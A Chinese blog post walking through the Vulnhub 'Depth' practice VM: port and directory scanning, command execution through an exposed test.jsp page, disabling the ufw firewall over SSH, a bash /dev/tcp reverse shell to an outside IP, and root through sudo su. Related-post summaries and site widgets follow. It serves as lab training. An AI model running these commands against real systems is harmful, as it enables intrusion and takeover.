Vulnhub靶机 Depth(渗透测试)

最新推荐文章于 2024-10-10 21:07:26 发布
最新推荐文章于 2024-10-10 21:07:26 发布
阅读量374 收藏 3
点赞数 5
文章标签: 服务器 运维 网络 安全性测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78721909/article/details/140781478
版权

一、下载地址

https://download.vulnhub.com/depth/DepthB2R.ova

二、获取靶机IP地址

1、修改网卡配置为net,同时扫描同一网段的机器

2.得到靶机IP,同时扫描服务器版本和端口信息

3.扫描该靶机目录

三、访问靶机IP

1.拼接扫描出来的目录

通过访问,拼接/manager/只会弹出个输入框

通过拼接/test.jsp,得到一个输入框

2.根据提示输入 ls -l /tmp ,可以执行

 尝试输入 ls -l /home ,等到buil用户

输入ps -aux,查看进程

发现sshd正在使用中,可能是被防火墙限制了

3.尝试关闭防火墙

ssh bill@localhost sudo ufw disable

4.利用ssh反弹shell

ssh bill@localhost bash -i >& /dev/tcp/47.99.195.123/8888 0>&1

5.成功反弹上

四、提权

1.利用sudo提权

sudo -l

2.直接输入sudo su ,提权成功

芜丶湖
关注
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub靶场】Depth:1靶机提权
qq_46421742的博客
07-28 293
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Depth: 1靶机
m0_61995767的博客
08-06 627
Depth: 1打靶记录
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 267
【代码】DepthB2R靶机渗透测试
vulnhubDepth靶机
wbplife的博客
08-02 384
输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。ls -l /home 查看到home目录内容,发现bill用户。存在系统命令执行漏洞,进行利用,反弹shell尝试失败。提示我们输入 ls -l /tmp 测试一下。,发现所有用户(ALL)都有sudo权限,运行环境:VMware运行该虚拟机。有一个目录/test.jsp。
DepthB2R靶场实战【超详细】
weixin_68615160的博客
08-05 375
输入ls -la /home,发现root 和bill用户。发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙。sudo -l查看具有sudo权限的命令程序。有一个test.jsp,我们访问它。kali开启监听,成功反弹shell。显示所有用户,直接sudo su。查看/etc下,防火墙是存在的。反弹未能成功,我们看一下进程。访问其8080web服务。发现开启了8080端口。提示我们可以输入命令。我们尝试反弹shell。我们对该端口进行扫描。
Vulnhub靶机Depth: 1
whoami
09-25 970
Vulnhub靶机Depth: 1实战
VulnHub系列』DC-1靶机渗透测试
qq_45300786的博客
11-29 454
0x00 前言 在开始之前我们需要知道的是, 靶机的ip获取方式是dhcp服务器来分配ip的,如果dhcp没有自动分配ip的话,请看我的置顶文章,解决没有ip的问题 而我的VMware就只有NAT模式可以使用dhcp服务器 那么接下来都将是NAT模式 工具、知识点和漏洞 nmap metasploit mysql 网站配置 hydra find命令 suid提权 配置环境 kali: 192.168.100.34 靶机DC-1: 192.168
vulnhub/Depth
qq_45230030的博客
04-28 291
前两天考试,人都考麻了,继续继续下载地址:GitHub - rishabhkant07/Privilege-Escalation-Cheatsheet-Vulnhub-: This is a Cheatsheet for CTF Challenges categorized by different Privilege Escalation Methods其中也附有相应的WP,也是有很多种方法,怎么方便怎么来吧。下载完靶机,更改网络为NAT模式,与攻击机设置为同一网卡模式。
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Linux查看下nginx及使用的配置文件
木槿
10-10 149
2、通过进行pid查到nginx路径。3、根据路径得到配置文件。1、查到nginx进程。
使用树莓派搭建音乐服务器
m0_50281408的博客
10-06 1377
本人手机存储空间128G,网易云音乐6个G,本就不富裕的空间更是雪上加霜,而且重点是,我根本没有听几首歌,清除缓存后,整个软件都还是占用了5个G左右,正巧,本人最近购入了一块树莓派zero 2w,秉承着不让树莓派变吃灰派的原则,所以萌生出了自己搭建音乐服务器的想法。至此一步就完成了,现在我将网易云常听的歌曲全部传到树莓派中,然后音流中就会扫描,大体的功能也和平常的音乐软件差不多,主要是占空间很小很小,几乎可以忽略不计。
linux:使用sar诊断问题
李白
10-10 483
工具包中的命令,用于收集、报告和保存各种系统活动的统计信息。它可以监控 CPU、内存、磁盘 I/O、网络等多种资源的使用情况。它生成了一段时间内的内存使用统计,包括空闲内存、已使用内存、缓存和缓冲区等信息。,可以分析系统的 CPU 性能,了解 CPU 是处于忙碌状态还是有足够的空闲资源,以及是否有 I/O 或 CPU 相关的瓶颈。:报告文件表、inode 表、缓冲区和内核内部的相关信息。:报告内存的使用情况,包括物理内存和交换空间的统计数据。:报告交换空间的活动情况,包括交换入和交换出的数据量。
10.10 QT服务器与客户端
最新发布
qq_73941453的博客
10-10 113
【代码】10.10 QT服务器与客户端。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值